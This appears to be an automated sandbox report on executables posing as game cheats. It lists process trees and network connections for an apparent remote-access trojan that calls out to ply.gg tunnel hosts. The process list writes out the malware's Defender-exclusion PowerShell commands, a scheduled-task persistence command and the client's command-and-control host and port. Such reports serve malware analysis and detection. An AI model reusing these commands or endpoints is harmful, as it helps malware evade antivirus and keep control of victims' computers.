| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Test cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u5ebawk3\u5ebawk3.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES373C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE2739B7113D4774B4711F2B45AE2B56.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5217.tmp.bat""
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9e0546f8,0x7fff9e054708,0x7fff9e054718
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6420 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB6DC.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB6DD.tmp.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5048 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5044 /prefetch:8
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\EpicInstaller-15.17.1.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 924D515C8C5C1008656DF2EB325504D2 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3B12.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240663328 5 CustomActionManaged!CustomActionManaged.CustomActions.ValidatePathLength
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C1C3FA90631C86EC8E5B4BF27B89411A
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI42E1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240665312 10 CustomActionManaged!CustomActionManaged.CustomActions.TelemetrySendStart
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1672 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI7982.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240679328 16 CustomActionManaged!CustomActionManaged.CustomActions.SetStartupCmdlineArgs
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI8B95.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240683921 22 CustomActionManaged!CustomActionManaged.CustomActions.CheckReparsePoints
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5069292959683568512,13880117472504775187,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6172 /prefetch:2
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 11AD163BF921D21355349AEC163E6361 E Global\MSI0000
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI57D0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240736312 31 CustomActionManaged!CustomActionManaged.CustomActions.MoveChainerToFolder
C:\Program Files (x86)\Epic Games\DirectXRedist\DXSETUP.exe
"C:\Program Files (x86)\Epic Games\DirectXRedist\DXSETUP.exe" /silent
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| GB | 92.123.128.169:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 169.128.123.92.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.149:443 | r.bing.com | tcp |
| GB | 92.123.128.180:443 | th.bing.com | tcp |
| GB | 92.123.128.180:443 | th.bing.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 149.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 104.18.41.55:443 | www.epicgames.com | tcp |
| US | 104.18.41.55:443 | www.epicgames.com | tcp |
| US | 104.18.41.55:443 | www.epicgames.com | tcp |
| US | 8.8.8.8:53 | store.epicgames.com | udp |
| US | 104.18.33.131:443 | store.epicgames.com | tcp |
| US | 104.18.33.131:443 | store.epicgames.com | tcp |
| US | 8.8.8.8:53 | 55.41.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | cdn1.unrealengine.com | udp |
| US | 8.8.8.8:53 | components.unrealengine.com | udp |
| US | 8.8.8.8:53 | cdn2.unrealengine.com | udp |
| US | 8.8.8.8:53 | static-assets-prod.epicgames.com | udp |
| US | 8.8.8.8:53 | epic-social-social-modules-prod.ol.epicgames.com | udp |
| GB | 18.245.143.114:443 | components.unrealengine.com | tcp |
| GB | 18.245.143.114:443 | components.unrealengine.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| GB | 18.244.114.120:443 | epic-social-social-modules-prod.ol.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| US | 8.8.8.8:53 | 131.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.114.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.233.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tracking.epicgames.com | udp |
| US | 3.228.148.160:443 | tracking.epicgames.com | tcp |
| GB | 23.44.233.32:443 | static-assets-prod.epicgames.com | tcp |
| US | 8.8.8.8:53 | 160.148.228.3.in-addr.arpa | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
